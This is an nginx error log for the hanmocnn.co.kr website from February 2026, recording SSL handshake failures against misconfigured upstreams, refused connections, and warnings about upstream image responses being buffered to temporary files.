2026/02/14 23:57:49 [error] 194#194: *1 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 04:07:41 [warn] 985#985: *108325 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/20/0000022207 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:57:49 [warn] 194#194: *1 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" 2026/02/19 04:07:41 [warn] 985#985: *108325 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/20/0000022208 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:57:49 [error] 194#194: *1 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 04:11:23 [warn] 985#985: *108339 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/20/0000022209 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:57:49 [warn] 194#194: *1 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" 2026/02/19 04:11:23 [warn] 985#985: *108339 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/21/0000022210 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 23:59:06 [error] 214#214: *21 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://192.168.0.250:80/", host: "www.hanmocnn.co.kr"
2026/02/14 23:59:08 [error] 214#214: *21 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://192.168.0.250:80/", host: "www.hanmocnn.co.kr"
2026/02/14 23:59:12 [error] 214#214: *21 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://192.168.0.250:80/", host: "www.hanmocnn.co.kr"
2026/02/14 23:59:42 [error] 227#227: *37 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://192.168.0.250:8081/", host: "www.hanmocnn.co.kr"
2026/02/14 23:59:46 [error] 227#227: *37 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://192.168.0.250:8081/", host: "www.hanmocnn.co.kr"
2026/02/15 00:02:19 [error] 241#241: *64 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
2026/02/15 00:02:19 [warn] 241#241: *64 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr"
2026/02/15 00:02:19 [error] 241#241: *64 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
2026/02/15 00:02:19 [warn] 241#241: *64 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr"
2026/02/15 00:02:52 [error] 253#253: *76 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr"
2026/02/15 00:02:52 [warn] 253#253: *76 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr"
2026/02/15 00:02:52 [error] 253#253: *76 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr"
2026/02/15 00:02:52 [warn] 253#253: *76 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr"
2026/02/15 00:03:33 [error] 282#282: *107 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://192.168.0.250:8081/", host: "www.hanmocnn.co.kr"
2026/02/15 00:03:40 [error] 282#282: *107 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://192.168.0.250:8081/", host: "www.hanmocnn.co.kr"
2026/02/15 00:04:37 [error] 292#292: *126 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8081/", host: "www.hanmocnn.co.kr"
2026/02/15 00:04:49 [error] 305#305: *138 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:80/", host: "www.hanmocnn.co.kr"
2026/02/15 00:05:16 [error] 319#319: *150 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8081/", host: "www.hanmocnn.co.kr"
2026/02/15 00:10:21 [error] 363#363: *212 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://192.168.0.250:8081/", host: "www.hanmocnn.co.kr"
2026/02/15 00:53:59 [warn] 378#378: *575 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/00/0000000001 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 01:03:57 [warn] 378#378: *585 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/00/0000000002 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 01:10:26 [warn] 378#378: *603 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/00/0000000003 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 01:11:14 [warn] 378#378: *603 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/00/0000000004 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 01:14:43 [warn] 378#378: *630 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/00/0000000005 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 01:17:46 [warn] 378#378: *641 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/00/0000000006 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 01:18:21 [warn] 378#378: *641 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/00/0000000007 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 01:18:51 [warn] 378#378: *641 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/00/0000000008 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 02:06:56 [warn] 521#521: *4047 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/49/0000001495 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 05:11:46 [warn] 519#519: *7561 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/98/0000002989 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 05:22:47 [warn] 519#519: *7591 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/99/0000002992 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 05:27:40 [warn] 519#519: *7607 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/99/0000002993 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 05:27:40 [warn] 519#519: *7607 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/99/0000002994 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 05:37:46 [warn] 519#519: *7631 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/99/0000002995 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 05:46:06 [warn] 520#520: *7667 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/99/0000002996 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 05:46:06 [warn] 520#520: *7667 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/99/0000002997 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 05:46:06 [warn] 520#520: *7667 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/99/0000002998 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 06:01:10 [warn] 531#531: *7684 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/00/0000003000 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 06:05:20 [warn] 530#530: *7693 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/00/0000003001 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 06:05:20 [warn] 530#530: *7693 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/00/0000003002 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 06:05:20 [warn] 530#530: *7693 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/00/0000003003 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 06:08:49 [warn] 531#531: *7709 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/00/0000003004 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 06:08:50 [warn] 531#531: *7709 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/00/0000003005 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 08:47:14 [warn] 822#822: *12731 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/52/0000004525 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 08:47:14 [warn] 822#822: *12731 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/52/0000004526 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 08:47:14 [warn] 822#822: *12731 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/52/0000004527 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 09:46:09 [warn] 821#821: *14660 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/59/0000004592 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 09:46:09 [warn] 821#821: *14660 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/59/0000004593 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 09:49:40 [warn] 821#821: *14675 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/59/0000004594 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 09:49:40 [warn] 821#821: *14675 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/59/0000004595 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 09:49:40 [warn] 821#821: *14675 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/59/0000004596 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 10:35:25 [warn] 822#822: *14801 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/59/0000004598 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 10:35:25 [warn] 822#822: *14801 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/59/0000004599 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 10:51:00 [warn] 822#822: *14829 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/60/0000004600 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 21:57:11 [warn] 844#844: *26949 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/28/0000006283 while reading upstream, client: 87.236.176.167, server: hanmocnn.co.kr, request: "GET /assets/images/favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/favicon.ico", host: "www.hanmocnn.co.kr"
2026/02/15 22:48:13 [warn] 844#844: *27003 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/28/0000006284 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 22:48:13 [warn] 844#844: *27003 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/28/0000006285 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 22:48:14 [warn] 844#844: *27003 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/28/0000006286 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 22:51:16 [warn] 844#844: *27013 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/28/0000006287 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 22:51:16 [warn] 844#844: *27013 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/28/0000006288 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 22:51:16 [warn] 844#844: *27013 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/28/0000006289 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 22:53:03 [warn] 842#842: *27026 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/29/0000006290 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 22:53:03 [warn] 842#842: *27026 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/29/0000006291 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 23:14:06 [warn] 845#845: *27056 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/29/0000006292 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 23:14:06 [warn] 845#845: *27056 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/29/0000006293 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 23:38:33 [warn] 845#845: *27091 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/29/0000006294 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 23:42:28 [warn] 845#845: *27101 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/29/0000006295 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 23:42:28 [warn] 845#845: *27101 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/29/0000006296 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 23:42:47 [warn] 845#845: *27101 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/29/0000006297 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
